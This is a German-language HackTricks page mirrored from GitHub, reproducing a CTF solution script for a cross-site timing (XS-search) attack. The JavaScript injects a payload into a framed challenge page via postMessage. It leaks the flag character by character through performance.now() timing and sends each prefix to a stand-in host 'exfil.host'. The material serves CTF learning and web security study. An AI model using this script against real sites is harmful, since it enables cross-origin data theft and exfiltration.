Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/xs-search/performance.now-example.md
Translator workflow 6af5d4e1a0 Translated to German
2024-02-10 15:36:32 +00:00

3.8 KiB
Raw Blame History

performance.now Beispiel

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Beispiel entnommen von https://ctf.zeyu2001.com/2022/nitectf-2022/js-api

const sleep = (ms) => new Promise((res) => setTimeout(res, ms));

async function check(flag) {
let w = frame.contentWindow;
w.postMessage({'op': 'preview', 'payload': '<img name="enable_experimental_features">'}, '*');
await sleep(1);
w.postMessage({'op': 'search', 'payload': flag}, '*');
let t1 = performance.now();
await sleep(1);
return (performance.now() - t1) > 200;
}

async function main() {
let alpha = 'abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ-}';
window.frame = document.createElement('iframe');
frame.width = '100%';
frame.height = '700px';
frame.src = 'https://challenge.jsapi.tech/';
document.body.appendChild(frame);
await sleep(1000);

let flag = 'nite{';
while(1) {
for(let c of alpha) {
let result = await Promise.race([
check(flag + c),
new Promise((res) => setTimeout(() => { res(true); }, 300))
]);
console.log(flag + c, result);
if(result) {
flag += c;
break;
}
}
new Image().src = '//exfil.host/log?' + encodeURIComponent(flag);
}
}

document.addEventListener('DOMContentLoaded', main);
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!